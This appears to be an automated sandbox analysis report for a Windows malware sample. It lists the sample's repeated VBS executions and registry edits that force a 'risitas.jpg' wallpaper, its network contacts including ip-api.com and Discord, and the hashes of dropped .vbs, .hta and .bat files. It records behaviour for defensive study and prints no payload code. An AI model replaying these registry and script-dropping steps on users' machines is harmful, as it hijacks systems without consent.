reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
NL 172.217.23.195:443 gstatic.com tcp
US 8.8.8.8:53 image.noelshack.com udp
US 35.227.215.6:443 image.noelshack.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 195.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 ddl8.data.hu udp
HU 217.65.97.74:443 ddl8.data.hu tcp
US 8.8.8.8:53 6.215.227.35.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 74.97.65.217.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\66C4.tmp\66C5.tmp\66C6.bat

MD5 074b0499fa7df4238b66cf7f0ab1ca64
SHA1 3ad09a2f3f51e5b4899397ec185672a6c0c4af18
SHA256 48fdcc988fd0f193c920c28ba7a8414497a4190278c8c077fda92a5349290b48
SHA512 496c6e1c462d40f5515ccf50b4ad7f14258782bc9329bad0c7776f4b22b66dd8790e181149604f87e816b865945dd4893c644b545aa84a4ed53ecfcabdca9686

memory/4088-2-0x000001BBB9BB0000-0x000001BBB9BF0000-memory.dmp

memory/4088-3-0x00007FF8368F3000-0x00007FF8368F5000-memory.dmp

memory/4088-4-0x00007FF8368F0000-0x00007FF8373B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\32120.vbs

MD5 93e179454db6fe9ac81112193de37cde
SHA1 4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9
SHA256 8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc
SHA512 a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

C:\Users\Admin\AppData\Local\Temp\1230.vbs

MD5 135594160762ab9dd80794d7b34ab32a
SHA1 638fef88bbb5d310c51eda07ca10918a482ad3ac
SHA256 531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0
SHA512 19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

memory/4716-101-0x000002892C3A0000-0x000002892C3C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vm3ocmwb.ncs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22fbec4acba323d04079a263526cef3c
SHA1 eb8dd0042c6a3f20087a7d2391eaf48121f98740
SHA256 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40
SHA512 fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

memory/4088-129-0x000001BBD4330000-0x000001BBD43A6000-memory.dmp

memory/4088-130-0x000001BBD43B0000-0x000001BBD4400000-memory.dmp

memory/4088-131-0x000001BBD4120000-0x000001BBD413E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 985b3105d8889886d6fd953575c54e08
SHA1 0f9a041240a344d82bac0a180520e7982c15f3cd
SHA256 5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d
SHA512 0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/4088-164-0x000001BBD42C0000-0x000001BBD42CA000-memory.dmp

memory/4088-165-0x000001BBD42F0000-0x000001BBD4302000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 994a0d9b5c448e02b6a9918b03447186
SHA1 e0e28e97672f139f6ff119ea0efa05936c1f351f
SHA256 25c23682c74bc0a095a28517707d8686e8fad715da790913cb78908c416e8284
SHA512 1b751b82b41f32aa619f80ae1d09516ab4463e565581d2f9f222752766bfc932b7d1d21971fbed8550180a049367d9bb9c1e8c16c47380ee15e097e5e755556c

memory/4088-183-0x000001BBD4400000-0x000001BBD45A9000-memory.dmp

memory/4088-184-0x00007FF8368F0000-0x00007FF8373B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\19765.vbs

MD5 3a7e0a94fa88dccd40d9b76b37d06db1
SHA1 d7604ddb660898ce3b1343aa712cf5926bc68bda
SHA256 368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4
SHA512 19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

C:\Users\Admin\AppData\Local\Temp\risitas.hta

MD5 af25ddf889ed3804a85b487a95993a94
SHA1 e22ce7ce7e6b18400913de410be90fa79c2b6edb
SHA256 bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab
SHA512 8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

C:\Users\Admin\AppData\Local\Temp\2297.vbs

MD5 aabbe725da9751315bbeeda4ef58d816
SHA1 476c78912d61e790a793c8e6606825f2b169947c
SHA256 0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360
SHA512 0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

C:\Users\Admin\AppData\Local\Temp\26761.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\20056.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Temp\15233.vbs

MD5 9ef84482b2ee91778b16da55affb45b0
SHA1 7bac03c894cab7908f1d523e866cd4c194d6e2e7
SHA256 9e307f84b3771e98ddad1b62673b15696a6a70354a9a564fe6c67d8866579756
SHA512 42453e77727948aaecc5418a6063cf7ab1ca006de33d0970553d496aa56213d4b54b2a422daf8775d170a3d2d70f9e4d9c777ae3045476172bdcaaa81b1a3452

C:\Users\Admin\AppData\Local\Temp\6180.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
